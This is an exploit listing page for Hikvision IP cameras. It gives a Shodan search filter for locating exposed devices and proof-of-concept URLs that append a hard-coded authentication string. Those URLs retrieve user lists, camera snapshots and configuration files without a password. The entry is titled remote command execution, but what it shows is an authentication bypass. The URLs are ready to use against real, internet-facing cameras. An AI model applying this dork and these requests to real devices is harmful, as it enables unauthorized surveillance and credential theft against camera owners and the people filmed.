Hikvision Camera - Remote command execution

2024.04.25

parsa rezaie khiabanloo (DE)

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: In Shodan search engine, the filter is "Web Version="3.1.3.150324" http.favicon.hash:999357577"

# Exploit Title: Exploit Title: Hikvision Camera - Remote command execution
# Date: 4/22/2024
# Google Dork : In Shodan search engine, the filter is "Web Version="3.1.3.150324" http.favicon.hash:999357577"
# Exploit Author: parsa rezaie khiabanloo
# Tested on: Windows/Linux
# 1. Description:
Hikvision included a magic string that allowed instant access to any camera, regardless of what the admin password was. All that needed was appending this string to Hikvision camera commands: (?auth=YWRtaW46MTEK).
# An issue was discovered in Hikvision IP Camera.
# 2 . Proof of Concept:
Retrieve a list of all users and their roles:
- http://camera.ip/Security/users?auth=YWRtaW46MTEK
Obtain a camera snapshot without authentication:
- http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
Download camera configuration:
- http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Hikvision Camera - Remote command execution

Dork: In Shodan search engine, the filter is "Web Version="3.1.3.150324" http.favicon.hash:999357577"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.